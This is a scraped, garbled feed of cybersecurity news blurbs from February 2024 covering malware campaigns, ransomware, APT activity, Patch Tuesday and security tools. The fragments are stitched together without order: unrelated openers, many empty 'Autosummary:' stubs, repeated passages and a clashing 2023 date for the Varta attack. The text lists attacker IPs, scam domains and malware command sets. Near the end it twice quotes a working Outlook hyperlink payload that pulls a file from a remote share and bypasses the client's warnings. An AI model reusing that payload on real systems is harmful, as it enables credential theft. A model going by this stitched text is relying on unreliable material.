Redis (Remote Dictionary Server) is an in-memory data structure store used as a database, cache, and message broker known for its high performance, serving thousands of requests per second for real-time applications in industries like gaming, technology, financial services, and healthcare. "CVE Prioritizer is an open-source tool designed to assist in prioritizing the patching of vulnerabilities. It integrates data from CVSS, EPSS, and CISA’s KEV catalog to offer insights into the probability of exploitation and the potential effects of vulnerabilities on your systems. How CVE Prioritizer works The tool leverages the correlation between CVSS and EPSS scores to improve efforts in fixing vulnerabilities. CVSS provides essential details about a vulnerability’s characteristics, whereas EPSS supplies information based … More
The post CVE Prioritizer: Open-source tool to prioritize vulnerability patching appeared first on Help Net Security.
"Autosummary:
It allows security teams to make informed decisions based on their unique contexts,” Mario Rojas, the creator of CVE Prioritizer, told Help Net Security. "70% of businesses report that fraud losses have increased in recent years and over half of consumers feel they’re more of a fraud target than a year ago, according to Experian. To thwart fraudulent activity in 2024, businesses need to deploy more sophisticated fraud protection solutions that harness the power of data and technology to mitigate risk and protect consumers. Experian suggests consumers and businesses watch out for these five fraud threats in 2024: Generative … More
The post Fraudsters have found creative ways to scam some businesses appeared first on Help Net Security.
"Autosummary:
Fraudsters expand into cause-related and investment deception From fake GoFundMe campaigns, social media giveaways, investment opportunities and text fraud, fraudsters are employing new methods that strike an emotional response from consumers with cause-related asks or too-good-to-be-real offers to gain access to consumers’ vital, personal information. Experian predicts fraudsters will use generative AI to accelerate “do-it-yourself” fraud with a wide range of deepfake content, such as emails, voice and video as well as code creation to set up scam websites and perpetuate online attacks. "Autosummary:
"Autosummary:
Charming Kitten, also called APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda, has a history of orchestrating a wide range of social engineering campaigns that cast a wide net in their targeting, often singling out think tanks, NGOs, and journalists. "Autosummary:
The five malicious apps are: Phone Cleaner - File Explorer (com.volabs.androidcleaner) PDF Viewer - File Explorer (com.xolab.fileexplorer) PDF Reader - Viewer & Editor (com.jumbodub.fileexplorerpdfviewer) Phone Cleaner: File Explorer (com.appiclouds.phonecleaner) PDF Reader: File Manager (com.tragisoap.fileandpdfmanager) Considering that Anatsa constantly launches new attack waves using fresh dropper apps, the total number of downloads is expected to further increase. Over the past four months, security researchers noticed five campaigns tailored to deliver the malware to users in the UK, Germany, Spain, Slovakia, Slovenia, and the Czech Republic. "Autosummary:
In June 2023, the Dutch mobile security firm disclosed an Anatsa campaign that targeted banking customers in the U.S., the U.K., Germany, Austria, and Switzerland at least since March 2023 using dropper apps that were collectively downloaded over 30,000 times on the Play Store. "Autosummary:
Russia-linked APT TAG-70 targets European government and military mail servers exploiting Roundcube XSS Pierluigi Paganini February 19, 2024 February 19, 2024 An APT group, tracked as TAG-70, linked to Belarus and Russia exploited XSS flaws in Roundcube webmail servers to target over 80 organizations. "Autosummary:
A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates. "Autosummary:
"Autosummary:
The following IP addresses have been associated with most of the attacks: 200.251.23.57 92.118.170.216 103.187.5.128 149.202.55.79 5.252.118.211 91.108.240.52 Wordfence also confirmed the active exploitation status of CVE-2024-25600, and reported seeing 24 detections in the past day. "Autosummary:
We have source code, details of the victims you have attacked, the amount of money extorted, the data stolen, chats, and much, much more," the message displayed on the LockBit panel reads. "Autosummary:
"Autosummary:
"Autosummary:
Anatsa Android banking Trojan expands to Slovakia, Slovenia, and Czechia Pierluigi Paganini February 19, 2024 February 19, 2024 The Android banking trojan Anatsa resurged expanding its operation to new countries, including Slovakia, Slovenia, and Czechia. "Autosummary:
Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Integrating cybersecurity into vehicle design and manufacturing In this Help Net Security interview, Yaron Edan, CISO at REE Automotive, discusses the cybersecurity landscape of the automotive industry, mainly focusing on electric and connected vehicles. The future of cybersecurity: Anticipating changes with data analytics and automation In this Help Net Security interview, Mick Baccio, Staff Security Strategist at Splunk SURGe, discusses … More
The post Week in review: AnyDesk phishing campaign targets employees, Microsoft fixes exploited zero-days appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: February 16, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Appdome, Center for Internet Security, Cyberhaven, LOKKER, Sumsub, and CompliancePro Solutions. Rise in cyberwarfare tactics fueled by geopolitical tensions In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. "Autosummary:
He has been charged with one count of conspiracy to commit fraud and related activity in connection with computers, one count of conspiracy to commit wire fraud, one count of conspiracy to commit money laundering, and one count of aggravated identity theft. "Autosummary:
"Autosummary:
"Autosummary:
For his criminal activity, the suspect now faces up to 8 years of prison and the confiscation of all property, for violations in the Criminal Code of Ukraine - Part 2 of Article 209 (laundering of property obtained by criminal means), Part 2 of Article 361 (unauthorized interference with the operation of information systems, electronic communication networks), and Part 1 of Article 361-1 (creation for the purpose of illegal use, distribution, or sale of harmful software or technical means, as well as their distribution or sale). "Autosummary:
CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks Pierluigi Paganini February 17, 2024 February 17, 2024 CISA warns that the Akira Ransomware gang is exploiting the Cisco ASA/FTD vulnerability CVE-2020-3259 (CVSS score: 7.5) in attacks in the wild. "Autosummary:
Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes Pierluigi Paganini February 17, 2024 February 17, 2024 A Ukrainian national pleaded guilty to his role in the Zeus and IcedID operations, which caused tens of millions of dollars in losses. "In this Help Net Security video, Andrey Slastenov, Head of Security Department at Gcore, discusses the findings of their latest report that provide insights into the current state of the DDoS protection market and cybersecurity trends. Key highlights from Q3–Q4 2023: The maximum attack power rose from 800 Gbps (1H 2023) to 1.6 Tbps. UDP floods constitute 62% of DDoS attacks. TCP floods and ICMP attacks remain popular at 16% and 12% respectively and SYN, … More
The post Cybersecurity sectors adjust as DDoS attacks reach new heights appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The admin account, which had access to a virtualized SharePoint server, also enabled the attackers to access another set of credentials stored in the server, which had administrative privileges to both the on-premises network and the Azure Active Directory (now called Microsoft Entra ID). "Autosummary:
APT28, also tracked under the monikers BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Pawn Storm, Sednit, Sofacy, and TA422, is assessed to be linked to Unit 26165 of Russia"s Main Directorate of the General Staff (GRU). "Autosummary:
In a Windows network, NTLM (New Technology LAN Manager) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. "Cyberint is unveiling its latest contribution to the infosec community: Ransomania. This free-to-use web application gives users access to a complete repository of ransomware data gathered by the Cyberint Research Team, empowering organizations to combat ransomware with efficiency and collaboration, with the tool making data easily accessible and understandable to business professionals and cybersecurity experts alike. In today’s digital landscape, cyber risk is no longer an isolated concern but a critical factor shaping business operations … More
The post Cyberint Ransomania empowers organizations to proactively defend against ransomware attacks appeared first on Help Net Security.
"Autosummary:
"In January 2024, an operation dismantled a network of hundreds of SOHO routers controlled by GRU Military Unit 26165, also known as APT 28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit. This network facilitated various crimes, including extensive spearphishing and credential harvesting against entities of interest to the Russian government, such as U.S. and foreign governments, military, and key security and corporate sectors. This botnet was distinct from prior GRU and Russian … More
The post U.S. authorities disrupt Russian intelligence’s botnet appeared first on Help Net Security.
"Autosummary:
In January 2024, an operation dismantled a network of hundreds of SOHO routers controlled by GRU Military Unit 26165, also known as APT 28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit. "Autosummary:
Over the coming months, NTTSH will be busy adding more integrations, including but not limited to Meraki, Bitdefender, Sophos, Zoom, MalwareBytes, OneLogin, OKTA, Zscaler, AWS, and many more! A similar geographic trend is visible in the telecommunications sector, where the USA, UK, and Australia account for roughly 52% of ransomware attacks, while in education, the USA, UK, and Canada account for approximately 83%.Some examples of integrations currently available include: Cloud: Azure Management Plane and Microsoft 365 (coming soon), Google Workspace (coming soon) Endpoint Detection and Response: Microsoft Defender for Endpoint, VMWare Carbon Black and Crowdstrike Falcon Insight Next-Generation Firewalls: Cisco Secure Firewall (ASA and Firepower Threat Defense), Fortinet Fortigate, and Palo Alto Networks NGFW.To provide a truly unique vantage point within NTTSH"s products and services, GTIC leverages proprietary intelligence capabilities and NTT"s position as the operator of one of the world"s top 5 tier 1 Internet backbones, providing unequaled visibility of Internet telemetry to gain an understanding of and insight into the various threat actors, exploit tools and malware – and the tactics, techniques, and procedures used by attackers. "Autosummary:
There is evidence to suggest that this operation may have been active since at least July 2022, going by bank logs containing references to ARDUINO_DAS that have been shared on carding forums like Crax Pro. A vast majority of the phishing kits are USPS-themed, with the campaigns directing users to bogus package tracking pages that prompt users to enter their personal and credit/debit card information, as evidenced by security researcher @JCyberSec_ on X (formerly Twitter) in early September 2022. "Autosummary:
CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor. "Autosummary:
(Symantec) Symantec also reports that recent Alpha attacks extensively employ living-off-the-land tools, including Taskkill, PsExec, Net.exe, and Reg.exe, for evasion. "Autosummary:
As such MDM offers a wide range of features such as remote wipe, device tracking, and application management, which the cybercriminals take advantage of to install malicious applications and obtain the information they need. "Autosummary:
In the fourth quarter of 2023 alone, the e-crime group listed 49 victims on its data leak portal, putting it behind LockBit (275), Play (110), ALPHV/BlackCat (102), NoEscape (76), 8Base (75), and Black Basta (72). "Autosummary:
With a clientele exceeding 300,000 worldwide, SolarWinds at the time serviced 96% of Fortune 500 companies, including high-profile companies like Apple, Google, and Amazon, as well as government organizations like the U.S. Military, Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States. "Autosummary:
"Autosummary:
This leading global financial services Fortune 500 company is the second-largest life insurance company in the U.S., with reported revenues of more than $50 billion in 2023, and it employs 40,000 people worldwide. "Microsoft on Tuesday released 73 updates in its monthly Patch Tuesday release, addressing issues in Microsoft Exchange Server and Adobe and two zero-day flaws being actively exploited in Microsoft Outlook (CVE-2024-21410) and Microsoft Exchange (CVE-2024-21413).
Including the recent reports that the Windows SmartScreen vulnerability (CVE-2024-21351) is under active exploitation, we have added “Patch Now” schedules to Microsoft Office, Windows and Exchange Server. The team at Readiness has provided this detailed infographic outlining the risks associated with each of the updates for this cycle.
Autosummary:
Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft development platforms (NET Core, .NET Windows Microsoft released two critical updates (CVE-2024-21357 and CVE-2024-20684) and 41 patches rated as important for Windows that cover the following components: Windows ActiveX and WDAC OLE DB Provider; Windows Defender; Windows Internet Connection Sharing; Windows Hyper-V; Windows Kernel. Browsers Microsoft released three minor updates to the Chromium-based Edge (CVE-2024-1283, CVE-2024-1284, and CVE-2024-1059) and updated the following reported vulnerabilities: CVE-2024-1060: CVE-2024-0056, CVE-2024-0057, CVE-2024-0057, CVE-2024-20677 and CVE-2024-21312: These were updated to resolve broken link issues.Chromium: CVE-2024-1060 Use after free in Canvas CVE-2024-1077: Chromium: CVE-2024-1077 Use after free in Network CVE-2024-21399: Microsoft Edge (Chromium-based) "Autosummary:
"Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Allan Liska – @uuallan Episode links: Sponsored by: BlackBerry – BlackBerry helps keeps you one step ahead. "Autosummary:
"Digital forensics plays a crucial role in analyzing and addressing cyberattacks, and it’s a key component of incident response. Additionally, digital forensics provides vital information for auditors, legal teams, and law enforcement agencies in the aftermath of an attack. Many cutting-edge digital forensics tools are on the market, but for those who cannot afford them, here’s a list of great free solutions to get you started. Autopsy Autopsy is a digital forensics platform widely employed … More
The post 5 free digital forensics tools to boost your investigations appeared first on Help Net Security.
"Autosummary:
It scans various inputs, including disk images, files, and directories, extracting organized information like email addresses, credit card numbers, JPEG images, and JSON fragments. "Picus Security has revealed a rise in hunter-killer malware, highlighting a significant shift in adversaries’ capability to pinpoint and thwart advanced enterprise defenses, including next-gen firewalls, antivirus programs, and EDR systems. There was a 333% increase in malware that can actively target defensive systems in an attempt to disable them. The identification of hunter-killer malware Drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and … More
The post Understanding the tactics of stealthy hunter-killer malware appeared first on Help Net Security.
"Autosummary:
The identification of hunter-killer malware Drawing parallels from the stealthy and offensive nature of hunter-killer submarines, these malware strains evade security measures with precision and proactively seek out and impair security tools, firewalls, logging services, audit systems, and other protective measures within an infected system. "Autosummary:
The intrusions targeted organizations dealing with foreign affairs, energy, defense, and transportation, as well as those involved with labor, social welfare, finance, parenthood, and local city councils. "Autosummary:
On iOS devices, the malware establishes a web socket channel to receive the following commands: Heartbeat : ping command and control (C2) server : ping command and control (C2) server init : send device information to the C2 : send device information to the C2 upload_idcard : request the victim to take an image of their ID card : request the victim to take an image of their ID card face : request the victim to take a video of their face : request the victim to take a video of their face upgrade : display bogus “device in use” message to prevent interruptions : display bogus “device in use” message to prevent interruptions album : sync photo library date (exfiltrate to a cloud bucket) : sync photo library date (exfiltrate to a cloud bucket) "Autosummary:
The researchers observed the following APT groups using artificial intelligence (AI) and large language models (LLMs) in various phases of their attack chain: China-linked APT groups Charcoal Typhoon and Salmon Typhoon; Iran-linked APT group Crimson Sandstorm; North Korea-linked APT group Emerald Sleet; Russia-linked APT group Forest Blizzard.Nation-state actors are using AI services and LLMs for cyberattacks Pierluigi Paganini February 15, 2024 February 15, 2024 Microsoft and OpenAI warn that nation-state actors are using ChatGPT to automate some phases of their attack chains, including target reconnaissance and social engineering attacks. "Autosummary:
Sophos" Advanced Threat Response Joint Task Force, or Sophos X-Ops for short, noticed fresh Qbot activity recently, with up to 10 new malware builds emerging since mid-December. "German battery manufacturer Varta was forced to shut down its IT systems and stop production as a result of a cyberattack. The Varta cyberattack The cyberattack occurred on Monday night and affected five of the company’s production plants and the administration. According to the German news outlet Finanzen, of the company’s five production sites, three are located in Germany, one in Romania and one in Indonesia. “The IT systems and thus also production were proactively … More
The post Battery maker Varta halts production after cyberattack appeared first on Help Net Security.
"Autosummary:
"Group-IB uncovered a new iOS trojan designed to steal users’ facial recognition data, identity documents, and intercept SMS. The trojan, dubbed GoldPickaxe.iOS by Group-IB’s Threat Intelligence unit, has been attributed to a Chinese-speaking threat actor codenamed GoldFactory, responsible for developing a suite of highly sophisticated banking trojans that also includes the earlier discovered GoldDigger and newly identified GoldDiggerPlus, GoldKefu, and GoldPickaxe for Android. To exploit the stolen biometric data, the threat actor utilizes AI face-swapping … More
The post iOS users beware: GoldPickaxe trojan steals your facial data appeared first on Help Net Security.
"Autosummary:
GoldFactory is a resourceful team adept at various tactics, including impersonation, accessibility keylogging, fake banking websites, fake bank alerts, fake call screens, identity, and facial recognition data collection. The trojan, dubbed GoldPickaxe.iOS by Group-IB’s Threat Intelligence unit, has been attributed to a Chinese-speaking threat actor codenamed GoldFactory, responsible for developing a suite of highly sophisticated banking trojans that also includes the earlier discovered GoldDigger and newly identified GoldDiggerPlus, GoldKefu, and GoldPickaxe for Android.In our assessment, it appears imminent that GoldPickaxe will soon reach Vietnam’s shores, while its techniques and functionality will be actively incorporated into malware targeting other regions,” said Andrey Polovinkin, Malware Analyst, Threat Intelligence team, Group-IB. "Autosummary:
The TL;DR Version Of SaaS Security 2023 brought some now infamous examples of malicious players leveraging or directly targeting SaaS, including the North Korean group UNC4899, 0ktapus ransomware group, and Russian Midnight Blizzard APT, which targeted well-known organizations such as JumpCloud, MGM Resorts, and Microsoft (respectively), and probably many others that often go unannounced. Wing Security (Wing), a SaaS security company, conducted an analysis of 493 SaaS-using companies in Q4 of 2023. "Autosummary:
"GoldFactory is a resourceful team adept at various tactics, including impersonation, accessibility keylogging, fake banking websites, fake bank alerts, fake call screens, identity, and facial recognition data collection," the researchers said. To mitigate the risks posed by GoldFactory and its suite of mobile banking malware, it"s strongly advised not to click on suspicious links, install any app from untrusted sites, as they are a common vector for malware, and periodically review the permissions given to apps, particularly those requesting for Android"s accessibility services. "Autosummary:
The fix for CVE-2023-36025 didn"t consider the case where a .URL file points to a .URL file.https://t.co/SLpw0L7mtY pic.twitter.com/x3lskKmBRi — Will Dormann (@wdormann) February 13, 2024 According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. "Autosummary:
Generally, the threat actors used the large language models to enhance their strategic and operational capabilities, including reconnaissance, social engineering, evasion tactics, and generic information gathering. "Autosummary:
Yutaka Sejiyama, a security researcher at Macnica, shared his Shodan scan results with BleepingComputer earlier today, reporting that as of February 15, 2024, 00:15 UTC, there were 13,636 Ivanti servers that had yet to apply patches for CVE-2024-21893, CVE-2024-21888, CVE-2023-46805, and CVE-2024-21887. "Autosummary:
Using commands stored on compromised websites with an outdated WordPress version, the hackers can control TinyTurla-NG with the following commands: timeout : changes the number of minutes the backdoor sleeps between asking the C2 for new tasks : changes the number of minutes the backdoor sleeps between asking the C2 for new tasks changeshell : instructs the backdoor to switch the current shell executing commands, i.e., from cmd.exe to PowerShell.exe, or vice versa. "Autosummary:
N/A 1 HongKong AdTiger Media Co., Limited 14567350391567024129 1 Mah Noor 07681945004880691201 12 Usama Ashfaq 06711852389684477953 2 Ali Raza 04534984293432164353 15 Muhammad Usman Tariq 17723433991509377025 5 SHABNUM FATIMA SHAH 02536959185141104641 4 QASMIC L.L.C-FZ 11321807192694194177 1 Phone numbers 888[-]960[-]3984 888[-]315[-]9188 888[-]715[-]1808 888[-]873[-]0295 888[-]317[-]0580 888[-]316[-]0466 888[-]983[-]0288 888[-]439[-]0639 888[-]312[-]2983 844[-]967[-]9649 855[-]200[-]3417 888[-]842[-]0793 888[-]207[-]3713 833[-]435[-]0029 888[-]494[-]4956 888[-]928[-]6404 888[-]374[-]1693 888[-]834[-]1050 888[-]497[-]3560 888[-]960[-]2303 888[-]430[-]0128 800[-]353[-]5613 888[-]407[-]1004 855[-]216[-]2411 844[-]679[-]7635 888[-]483[-]2851 888[-]657[-]2401 888[-]580[-]0106 888[-]326[-]7299 888[-]870[-]2661 888[-]203[-]1692 855[-]428[-]7345 888[-]641[-]0108 888[-]960[-]0688 888[-]347[-]7462 888[-]448[-]0550 888[-]834[-]0998 888[-]470[-]8496 888[-]554[-]0461 855[-]980[-]1080 888[-]539[-]0722 866[-]685[-]0355 888[-]715[-]1806 888[-]960[-]2550 888[-]641[-]0096 888[-]996[-]5133 Scammer domains 360billingservices[.]com aadigital[.]online citrexsolutions[.]co digitelcare[.]com eco-designs[.]store economical-deals[.]co electricenergybundle[.]com electricenergyservice[.]com electricpowerdeal[.]com energpaybill[.]com energybilling[.]net energybillservice[.]online energycredits[.]online energyhelpcenter[.]com energypayment[.]shop energypoweroffer[.]com globalenergysolutionz[.]com homeutilityservices[.]com makeabillpayment[.]com paysenergy[.]online powerelectricoffers[.]com qasmic[.]com rebornsolutions[.]co telecombilling[.]us telecomcredits[.]us thepowerpayllc[.]org uenergyproviders[.]store utilitybillsolution[.]site utilitybillspayments[.]org utilitydiscounts[.]store utilityservices[.]us We don’t just report on phone security—we provide it Cybersecurity risks should never spread beyond a headline. Keep your identity and money safe from scammers This scam is widespread, and so our advice right now is to avoid clicking on any ad from search as the malicious ads largely outnumber the legitimate ones. Indicators of Compromise Google advertiser accounts Advertiser name Advertiser ID Number of ads Fraudulent utility scam ads The scam begins when a user searches for keywords related to their energy bill. "Autosummary:
The Rhysida decryptor is just the latest in a line of ransomware recovery tools that have appeared in recent years - including utilities to help the victims of the likes of Yanlouwang, MegaCortex, Akira, REvil, and a version of Conti. "NICE Actimize announces three advanced generative AI-based solutions designed to fight financial crime and allow organizations to significantly reduce the manual and labor-intensive tasks currently employed in financial crime investigations and reporting. Offering up to a 50% reduction in investigation time and 70% time savings in SAR filing, these innovations provide unprecedented efficiency in financial crime and compliance risk management programs. With generative AI embedded into NICE Actimize’s advanced ActOne enterprise risk case management platform, … More
The post NICE Actimize introduces generative AI-based solutions designed to fight financial crime appeared first on Help Net Security.
"Autosummary:
"Mitek introduced MiControl, a comprehensive fraud management console that works with Mitek’s Check Fraud Defender. MiControl detects check fraud, reduces losses and further increases consumers’ online security. With its advanced visualizations and overlays, paired with business rules configured by the bank or financial institution, MiControl can decrease the time it takes for a fraud analyst to review and make a decision about a suspect check from up to 10 minutes to about 90 seconds. Despite … More
The post Mitek MiControl empowers financial institutions to detect check fraud appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
In an alert published yesterday, web infrastructure company Akamai said it has observed "significant scanning activity" targeting CVE-2024-22024 starting February 9, 2024, following the publication of a proof-of-concept (PoC) by watchTowr. "Autosummary:
The State Department previously announced bounties of up to $15 million for tips on members and affiliates of the Hive, Clop, Conti [1, 2], REvil (Sodinokibi), and Darkside ransomware operations. "Autosummary:
"Additionally, in order to neutralize the GRU"s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers" firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation," the Justice Department said. "Autosummary:
Pierluigi Paganini February 15, 2024 February 15, 2024 On February 12, 2023, a cyber attack halted operations at five production plants of German battery manufacturer Varta. "Autosummary:
The U.S. Department of Justice first charged him in 2012 for his involvement in the Zeus malware operation and the theft of millions of dollars using personal identification numbers, bank account numbers, credentials, and other sensitive info stolen from infected devices. "Autosummary:
"Autosummary:
"Additionally, in order to neutralize the GRU"s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers" firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation," the Justice Department said. "While AI technology has the potential to streamline and automate processes for beneficial outcomes, it also comes with an equal number of risks to data protection, cybersecurity, and other ethical concerns, according to iProov. Digital ecosystems continue to grow and multiply at record levels as organizations and governments seek to provide remote access and services to meet consumer and workforce demand. However, this growth’s unintended side effect is an ever-expanding attack surface that, coupled with … More
The post Cybercriminals get productivity boost with AI appeared first on Help Net Security.
"Autosummary:
However, in 2023, malicious actors exploited a loophole in some systems by using cyber tools, such as emulators, to conceal the existence of virtual cameras, making it harder for biometric solution providers to detect. "Initial access brokers (IABs) are increasingly targeting entities within NATO member states, indicating a persistent and geographically diverse cyberthreat landscape, according to Flare. IABs infiltrate systems and gain unauthorized access through various techniques, including spear-phishing, exploiting unpatched vulnerabilities, and leveraging leaked and stolen credentials, with the primary goal of establishing persistence in these environments. Leaked credentials and cookies from stealer logs can be a common vector for IABs to gain initial access. Flare analyzed hundreds … More
The post Threat actors intensify focus on NATO member states appeared first on Help Net Security.
"Autosummary:
The cautious approach of sellers on forums like Exploit, who often withhold sensitive details to avoid victim identification, is an example of the ongoing cat-and-mouse game between cybercriminals, researchers, and law enforcement. "In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. How have cyber threats evolved over the last year, and what trends are we seeing regarding attack vectors and methodologies? To some extent, cybersecurity fatigue and complacency have left gaps where threat actors … More
The post Rise in cyberwarfare tactics fueled by geopolitical tensions appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Matt Shelton, Head of Threat Research and Analysis at Google Cloud, discusses the latest Threat Horizons Report, which provides intelligence-derived trends, expertise, and recommendations on threat actors to help inform cloud customer security strategies in 2024. Caveat, when talking about public-private partnerships – what is needed is real operational and ongoing public-private collaboration is essential for sharing information, developing best practices, and mitigating risks and is essential for building a more secure and resilient cyber ecosystem. To some extent, cybersecurity fatigue and complacency have left gaps where threat actors have exploited old vulnerabilities, including gaps in logging and patching, to get a stalwart beachhead into the network. "Autosummary:
The infection procedure documented by Trend Micro exploits CVE-2024-21412 to drop a malicious installer file ("7z.msi") by clicking on a booby-trapped URL ("fxbulls[.]ru") distributed via forex trading forums under the pretext of sharing a link to a stock chart image that, in reality, is an internet shortcut file ("photo_2023-12-29.jpg.url"). "Autosummary:
Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability (CVSS score: 7.5) - Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability CVE-2024-21380 (CVSS score: 8.0) - Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability (CVSS score: 8.0) - Microsoft Dynamics Business Central/NAV Information Disclosure Vulnerability CVE-2024-21410 (CVSS score: 9.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVSS score: 9.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability CVE-2024-21413 (CVSS score: 9.8) - Microsoft Outlook Remote Code Execution Vulnerability "CVE-2024-21410 is an elevation of privilege vulnerability in Microsoft Exchange Server," Satnam Narang, senior staff research engineer at Tenable, said in a statement. Water Hydra, first detected in 2021, has a track record of launching attacks against banks, cryptocurrency platforms, trading services, gambling sites, and casinos to deliver a trojan called DarkMe using zero-day exploits, including the WinRAR flaw that came to light in August 2023 (CVE-2023-38831, CVSS score: 7.8). "Autosummary:
"Autosummary:
Financial firms report 703 cyberattack attempts per week.1 On average, 270 attacks (entailing unauthorized access of data, applications, networks, or devices) occurred in financial services, an increase of 31% compared with the prior year.2 On average, financial services businesses take an average of 233 days to detect and contain a data breach.3 43% of senior bank executives don"t believe their bank is adequately equipped to protect customer data, privacy, and assets in the event of a cyberattack.4 The average data breach cost in financial services is $5.72 million per incident.5 State-sponsored cyberattacks also pose a unique threat to the financial sector. Similarly, in recent times, there has been a concerning trend where major service providers catering to small-medium-sized banks, such as FIS, Fiserv, and Jack Henry, have become prime targets for cyber-attacks. To effectively navigate this landscape, community banks must develop a deep understanding of relevant regulations, such as the GBLA, PCI DSS, SOX, and more.Advanced Cloud Security Strategies Cloud computing, with its numerous benefits of scalability, flexibility, and cost-effectiveness, is increasingly being adopted by financial institutions.This involves creating a cohesive framework that combines advanced technology solutions, thorough policies and procedures, regular risk assessments, continuous monitoring, and proactive incident response planning.Additionally, outsourcing executive-level insights, such as a virtual Chief Information Security Officer (vCISO), can provide strategic guidance and governance to strengthen the bank"s overall cybersecurity posture. "Autosummary:
"The takedown of the QakBot botnet infrastructure was a victory, but the bot"s creators remain free, and someone who has access to QakBot"s original source code has been experimenting with new builds and testing the waters with these latest variants," Andrew Brandt, principal researcher at Sophos X-Ops, said. "Autosummary:
"Autosummary:
The first and most simple trick is to associate commands containing typing errors (e.g., "ifconfigg" instead of "ifconfig") with malicious snap packages, leading the "command-not-found" utility to suggest the installation of malware to the user, who is unlikely to realize their typo at that point. Typo-squatting and impersonation risks All the above lays the ground for a risky situation as long as attackers find a way to promote their packages through the "command-not-found" utility, but as the analysts explain, there"s a comfortable margin for that, too. "Autosummary:
"ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments," the FBI said in December. "Autosummary:
Broadly speaking, an attack requires a team of people that: Breaks in to an internet-connected computer, researches the target to see if they’re worth the effort of an attack, explores their network, elevates their privileges until they’re an all-conquering administrator, steals and stores terabytes of data, attacks security software and backups, positions ransomware, runs it, and then conducts negotiations. "Autosummary:
As you can see in the sheet below (click to expand), after a full review we were left with four malicious files that we missed and the two PUP-related files. "Autosummary:
Adobe has released security updates to address vulnerabilities in several products: The Android Security Bulletin for February contains details of security vulnerabilities for patch level 2024-02-05 or later. "Microsoft and OpenAI have identified attempts by various state-affiliated threat actors to use large language models (LLMs) to enhance their cyber operations. Threat actors use LLMs for various tasks Just as defenders do, threat actors are leveraging AI (more specifically: LLMs) to boost their efficiency and continue to explore all the possibilities these technologies can offer. Microsoft and OpenAI have shared how different known state-backed adversaries have been using LLMs: Russian military intelligence actor Forest … More
The post How are state-sponsored threat actors leveraging AI? appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named "jupyter-notebook."" To make matters worse, the command-not-found utility suggests the snap package above the legitimate APT package for jupyter-notebook, misleading users into installing the fake snap package. "Autosummary:
The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used "something"), as shown below: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* This type of hyperlink bypasses Outlook security restriction, and Outlook will access the "\\10.10.111.111\test\test.rtf" remote resource when the link is clicked without throwing any warnings or errors. "Autosummary:
"Autosummary:
Today, Microsoft also mistakenly tagged a critical Outlook remote code execution (RCE) vulnerability (CVE-2024-21413) as exploited in attacks before being fixed during this month"s Patch Tuesday. "Autosummary:
LockBit promises “maximum publicity” On Tuesday, the LockBit ransomware group claimed responsibility for the attack on Fulton County saying, publishing 25 screenshots to prove they had gained access to the county’s systems and that they had stolen sensitive data. "Autosummary:
The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used "something"), as shown below: *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>* This type of hyperlink bypasses Outlook security restriction, and Outlook will access the "\\10.10.111.111\test\test.rtf" remote resource when the link is clicked without throwing any warnings or errors. "Autosummary:
